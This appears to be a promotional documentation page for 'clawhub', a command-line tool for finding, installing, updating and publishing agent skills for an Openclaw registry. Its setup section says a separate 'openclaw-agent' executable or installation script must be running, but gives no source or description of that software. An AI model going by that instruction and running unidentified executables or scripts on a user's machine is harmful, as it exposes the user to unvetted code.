What is clawhub?

clawhub is the primary command-line tool for developers working with the Openclaw Skills ecosystem. It provides a robust set of commands to interact with the central registry, allowing users to effortlessly find and integrate new functionalities into their AI agents. By serving as a bridge between the cloud-based registry and local development environments, it ensures that your agents are always equipped with the precise tools needed for complex coding and automation tasks.

Built to work in tandem with the openclaw-agent utility, this CLI handles the heavy lifting of versioning, dependency resolution, and directory management. Whether you are a user looking to expand your agent's capabilities or a developer aiming to share new Openclaw Skills with the community, clawhub provides the professional-grade infrastructure required for modern AI agent development.

clawhub Use Cases

  • Searching for specific Openclaw Skills like database backups or frontend utilities from the command line.
  • Automating the installation of agent skills within specific project directories or global paths.
  • Synchronizing local skill sets with the latest versions using hash-based matching for consistency.
  • Publishing custom-developed agent skills to clawhub.com with full metadata and versioning support.
  • Managing local skill inventories and verifying authentication status for secure registry access.

How clawhub Works

  1. The user installs the clawhub package via npm and ensures the required background agent is active for their OS.
  2. The CLI communicates with the central registry to search for or fetch requested Openclaw Skills.
  3. During installation, the tool downloads the skill package and places it into the local ./skills directory, maintaining correct file structures.
  4. When updating, the CLI calculates local file hashes to compare against registry versions, ensuring only necessary changes are applied.
  5. For publishing, the CLI validates the local directory against the provided slug and metadata before uploading the new version to the registry.

clawhub Setup

First, ensure you have Node.js installed, then install the CLI globally:

npm i -g clawhub

Important: You must have the openclaw-agent utility running. For Windows, run the executable; for macOS, run the provided installation script. Once the agent is active, authenticate your session:

clawhub login
clawhub whoami

clawhub Data Schema & Taxonomy

The clawhub CLI manages data using a standardized directory structure and metadata mapping to ensure compatibility across Openclaw Skills:

Component Description
Registry URL Defaults to https://www.clawhub.ai/ (Configurable via environment variables)
Local Directory Default target is the ./skills folder within your current workspace
Metadata Fields Includes name, slug, version, changelog, and functional requirements
Hash Mapping Used for verifying file integrity and managing skill updates

clawhub Advanced Features

  • Hash-based update logic that intelligently upgrades Openclaw Skills to the latest version or a specific target.
  • Flexible registry overrides via environment variables or CLI flags for private registry support.
  • Bulk update capabilities with --all and --force flags for rapid environment synchronization.
  • Non-interactive mode using --no-input for seamless integration into CI/CD pipelines and automated setups.
  • Comprehensive versioning control allowing users to lock skills to specific releases for environment stability.
